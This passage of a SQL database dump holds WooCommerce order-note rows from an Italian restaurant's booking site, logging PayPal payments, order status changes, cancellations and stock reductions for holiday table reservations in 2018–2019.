17:13:03','2018-03-26 15:13:03','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(681,667,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-26 17:13:03','2018-03-26 15:13:03','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone - Pasquetta (pasquetta-2pax) ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(682,669,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-26 20:57:56','2018-03-26 18:57:56','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(683,669,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-26 20:57:59','2018-03-26 18:57:59','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(684,669,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-26 20:57:59','2018-03-26 18:57:59','Magazzino dell\'elemento Prenotazione Tavolo per 5 Persone - Pasquetta (pasquetta-5pax) ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(685,668,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-26 21:25:39','2018-03-26 19:25:39','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(686,670,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-27 11:29:26','2018-03-27 09:29:26','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(687,670,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-27 11:29:27','2018-03-27 09:29:27','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(688,670,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-27 11:29:27','2018-03-27 09:29:27','Magazzino dell\'elemento Prenotazione Tavolo per 6 Persone - Pasquetta (pasquetta-6pax) ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(689,671,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-27 21:15:50','2018-03-27 19:15:50','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(690,671,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-27 21:15:52','2018-03-27 19:15:52','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(691,671,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-27 21:15:52','2018-03-27 19:15:52','Magazzino dell\'elemento Prenotazione Tavolo per 3 Persone - Pasqua (pasqua2018-3pax) ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(692,672,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-28 09:29:24','2018-03-28 07:29:24','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(693,672,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-28 09:29:25','2018-03-28 07:29:25','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(694,672,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-28 09:29:26','2018-03-28 07:29:26','Magazzino dell\'elemento Prenotazione Tavolo per 4 Persone - Pasqua (pasqua-4pax) ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(695,673,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-28 21:35:14','2018-03-28 19:35:14','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(696,673,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-28 21:35:15','2018-03-28 19:35:15','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(697,673,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-28 21:35:15','2018-03-28 19:35:15','Magazzino dell\'elemento Prenotazione Tavolo per 6 Persone - Pasquetta (pasquetta-6pax) ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(698,674,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-29 02:52:27','2018-03-29 00:52:27','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(699,675,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-29 10:04:37','2018-03-29 08:04:37','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(700,675,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-29 10:04:38','2018-03-29 08:04:38','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(701,675,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-29 10:04:38','2018-03-29 08:04:38','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone - Pasquetta (pasquetta-2pax) ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(702,676,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-29 13:31:25','2018-03-29 11:31:25','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(703,676,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-29 13:31:27','2018-03-29 11:31:27','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(704,676,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-29 13:31:27','2018-03-29 11:31:27','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone - Pasquetta (pasquetta-2pax) ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(705,677,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-29 18:01:21','2018-03-29 16:01:21','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(706,677,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-29 18:01:23','2018-03-29 16:01:23','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(707,677,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-29 18:01:23','2018-03-29 16:01:23','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone - Pasquetta (pasquetta-2pax) ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(708,678,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-30 12:12:50','2018-03-30 10:12:50','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(709,678,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-30 12:12:52','2018-03-30 10:12:52','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(710,678,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-30 12:12:52','2018-03-30 10:12:52','Magazzino dell\'elemento Prenotazione Tavolo per 4 Persone - Pasqua (pasqua-4pax) ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(711,679,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-30 16:51:53','2018-03-30 14:51:53','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(712,679,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-30 16:51:55','2018-03-30 14:51:55','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(713,679,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-30 16:51:55','2018-03-30 14:51:55','Magazzino dell\'elemento Prenotazione Tavolo per 5 Persone - Pasquetta (pasquetta-5pax) ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(714,680,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-30 19:55:45','2018-03-30 17:55:45','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(715,680,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-30 19:55:46','2018-03-30 17:55:46','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(716,680,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-30 19:55:46','2018-03-30 17:55:46','Magazzino dell\'elemento Prenotazione Tavolo per 4 Persone - Pasquetta (pasquetta-4pax) ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(717,681,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-30 20:12:09','2018-03-30 18:12:09','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(718,681,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-30 20:12:11','2018-03-30 18:12:11','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(719,681,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-30 20:12:11','2018-03-30 18:12:11','Magazzino dell\'elemento Prenotazione Tavolo per 4 Persone - Pasquetta (pasquetta-4pax) ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(720,682,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-30 23:23:08','2018-03-30 21:23:08','Ordine cancellato dal cliente. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(721,683,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-31 02:01:03','2018-03-31 00:01:03','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(722,684,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-31 11:51:37','2018-03-31 09:51:37','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(723,684,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-31 11:51:39','2018-03-31 09:51:39','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(724,684,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-03-31 11:51:39','2018-03-31 09:51:39','Magazzino dell\'elemento Prenotazione Tavolo per 3 Persone - Pasquetta (pasquetta-3pax) ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(725,686,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-04-10 16:22:39','2018-04-10 14:22:39','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(726,686,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-04-10 16:22:46','2018-04-10 14:22:46','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(727,688,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-04-20 17:02:42','2018-04-20 15:02:42','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(728,688,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-04-20 17:02:47','2018-04-20 15:02:47','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(729,688,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-04-20 17:02:59','2018-04-20 15:02:59','Lo stato dell\'ordine è cambiato da In lavorazione a Completato.',0,'1','WooCommerce','order_note',0,0),(730,690,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-05-22 08:29:00','2018-05-22 06:29:00','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(731,690,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-05-22 08:29:02','2018-05-22 06:29:02','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(732,693,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-05-30 17:19:46','2018-05-30 15:19:46','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(733,693,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-05-30 17:19:48','2018-05-30 15:19:48','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(735,695,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-07-08 13:51:37','2018-07-08 11:51:37','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(736,695,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-07-08 13:51:39','2018-07-08 11:51:39','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(737,695,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-07-08 13:52:13','2018-07-08 11:52:13','Lo stato dell\'ordine è cambiato da In lavorazione a Completato.',0,'1','WooCommerce','order_note',0,0),(738,697,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-07-14 15:02:52','2018-07-14 13:02:52','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(739,697,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-07-14 15:02:53','2018-07-14 13:02:53','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(740,697,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-07-14 15:03:02','2018-07-14 13:03:02','Lo stato dell\'ordine è cambiato da In lavorazione a Completato.',0,'1','WooCommerce','order_note',0,0),(741,699,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-07-14 17:09:44','2018-07-14 15:09:44','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(742,699,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-07-14 17:09:45','2018-07-14 15:09:45','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(743,699,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-07-14 17:09:58','2018-07-14 15:09:58','Lo stato dell\'ordine è cambiato da In lavorazione a Completato.',0,'1','WooCommerce','order_note',0,0),(744,701,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-07-18 18:50:28','2018-07-18 16:50:28','Ordine cancellato dal cliente. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(745,702,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-07-18 19:45:32','2018-07-18 17:45:32','Ordine cancellato dal cliente. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(747,704,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-07-23 16:18:53','2018-07-23 14:18:53','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(748,704,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-07-23 16:18:54','2018-07-23 14:18:54','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(749,704,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-07-23 16:18:57','2018-07-23 14:18:57','Lo stato dell\'ordine è cambiato da In lavorazione a Completato.',0,'1','WooCommerce','order_note',0,0),(750,707,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-07-26 18:33:20','2018-07-26 16:33:20','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(751,707,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-07-26 18:33:24','2018-07-26 16:33:24','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(755,709,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-09-22 16:44:16','2018-09-22 14:44:16','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(756,709,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2018-09-22 16:44:22','2018-09-22 14:44:22','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(757,716,'WooCommerce','woocommerce@ristorantesolymar.it','','','2018-12-12 21:35:49','2018-12-12 20:35:49','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(758,716,'WooCommerce','woocommerce@ristorantesolymar.it','','','2018-12-12 21:35:50','2018-12-12 20:35:50','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(759,718,'WooCommerce','woocommerce@ristorantesolymar.it','','','2018-12-14 21:20:56','2018-12-14 20:20:56','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(760,718,'WooCommerce','woocommerce@ristorantesolymar.it','','','2018-12-14 21:20:57','2018-12-14 20:20:57','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(761,720,'WooCommerce','woocommerce@ristorantesolymar.it','','','2018-12-16 15:20:51','2018-12-16 14:20:51','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(762,720,'WooCommerce','woocommerce@ristorantesolymar.it','','','2018-12-16 15:20:53','2018-12-16 14:20:53','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(763,720,'WooCommerce','woocommerce@ristorantesolymar.it','','','2018-12-16 15:28:08','2018-12-16 14:28:08','Lo stato dell\'ordine è cambiato da In lavorazione a Completato.',0,'1','WooCommerce','order_note',0,0),(764,722,'WooCommerce','woocommerce@ristorantesolymar.it','','','2018-12-27 11:34:11','2018-12-27 10:34:11','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(765,722,'WooCommerce','woocommerce@ristorantesolymar.it','','','2018-12-27 11:34:12','2018-12-27 10:34:12','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(766,724,'WooCommerce','woocommerce@ristorantesolymar.it','','','2018-12-27 11:40:55','2018-12-27 10:40:55','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(767,724,'WooCommerce','woocommerce@ristorantesolymar.it','','','2018-12-27 11:40:56','2018-12-27 10:40:56','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(768,734,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-01 19:03:38','2019-02-01 18:03:38','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(769,734,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-01 19:03:38','2019-02-01 18:03:38','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 22&rarr;21',0,'1','WooCommerce','order_note',0,0),(770,734,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-01 19:03:39','2019-02-01 18:03:39','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(771,735,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-02 07:31:56','2019-02-02 06:31:56','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(772,735,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-02 07:31:56','2019-02-02 06:31:56','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 21&rarr;20',0,'1','WooCommerce','order_note',0,0),(773,735,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-02 07:31:57','2019-02-02 06:31:57','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(774,736,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-02 13:27:20','2019-02-02 12:27:20','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(775,737,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-04 10:36:25','2019-02-04 09:36:25','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(776,737,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-04 10:36:25','2019-02-04 09:36:25','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 20&rarr;19',0,'1','WooCommerce','order_note',0,0),(777,737,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-04 10:36:25','2019-02-04 09:36:25','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(778,738,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-05 19:45:14','2019-02-05 18:45:14','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(779,739,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-06 07:40:32','2019-02-06 06:40:32','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(780,739,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-06 07:40:32','2019-02-06 06:40:32','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 19&rarr;18',0,'1','WooCommerce','order_note',0,0),(781,739,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-06 07:40:33','2019-02-06 06:40:33','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(782,740,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-07 20:48:03','2019-02-07 19:48:03','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(783,740,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-07 20:48:03','2019-02-07 19:48:03','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 18&rarr;17',0,'1','WooCommerce','order_note',0,0),(784,740,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-07 20:48:04','2019-02-07 19:48:04','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(785,741,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-08 15:00:32','2019-02-08 14:00:32','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(786,741,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-08 15:00:32','2019-02-08 14:00:32','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 17&rarr;16',0,'1','WooCommerce','order_note',0,0),(787,741,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-08 15:00:33','2019-02-08 14:00:33','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(788,743,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-10 13:12:36','2019-02-10 12:12:36','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(789,743,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-10 13:12:36','2019-02-10 12:12:36','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 16&rarr;15',0,'1','WooCommerce','order_note',0,0),(790,743,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-10 13:12:36','2019-02-10 12:12:36','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(791,744,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-10 23:05:03','2019-02-10 22:05:03','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(792,744,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-10 23:05:03','2019-02-10 22:05:03','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 15&rarr;14',0,'1','WooCommerce','order_note',0,0),(793,744,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-10 23:05:04','2019-02-10 22:05:04','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(794,745,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-11 10:43:29','2019-02-11 09:43:29','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(795,745,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-11 10:43:30','2019-02-11 09:43:30','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 14&rarr;13',0,'1','WooCommerce','order_note',0,0),(796,745,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-11 10:43:30','2019-02-11 09:43:30','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(797,746,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-11 11:52:39','2019-02-11 10:52:39','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(798,746,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-11 11:52:39','2019-02-11 10:52:39','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 13&rarr;12',0,'1','WooCommerce','order_note',0,0),(799,746,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-11 11:52:40','2019-02-11 10:52:40','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(800,758,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-12 14:19:35','2019-02-12 13:19:35','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(801,758,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-12 14:19:35','2019-02-12 13:19:35','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 12&rarr;11',0,'1','WooCommerce','order_note',0,0),(802,758,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-12 14:19:35','2019-02-12 13:19:35','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(803,761,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-12 19:18:47','2019-02-12 18:18:47','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(804,761,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-12 19:18:48','2019-02-12 18:18:48','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 11&rarr;10',0,'1','WooCommerce','order_note',0,0),(805,761,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-12 19:18:48','2019-02-12 18:18:48','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(806,741,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-12 19:27:43','2019-02-12 18:27:43','Pagamento refunded tramite IPN. Lo stato dell\'ordine è cambiato da In lavorazione a Rimborsato.',0,'1','WooCommerce','order_note',0,0),(807,763,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-12 19:52:30','2019-02-12 18:52:30','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(808,763,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-12 19:52:30','2019-02-12 18:52:30','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 10&rarr;9',0,'1','WooCommerce','order_note',0,0),(809,763,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-12 19:52:30','2019-02-12 18:52:30','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(810,764,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-13 11:12:38','2019-02-13 10:12:38','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(811,764,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-13 11:12:38','2019-02-13 10:12:38','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 9&rarr;8',0,'1','WooCommerce','order_note',0,0),(812,764,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-13 11:12:39','2019-02-13 10:12:39','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(813,765,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-13 12:14:34','2019-02-13 11:14:34','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(814,765,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-13 12:14:34','2019-02-13 11:14:34','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 8&rarr;7',0,'1','WooCommerce','order_note',0,0),(815,765,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-13 12:14:34','2019-02-13 11:14:34','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(816,766,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-13 14:31:51','2019-02-13 13:31:51','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(817,766,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-02-13 14:31:52','2019-02-13 13:31:52','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 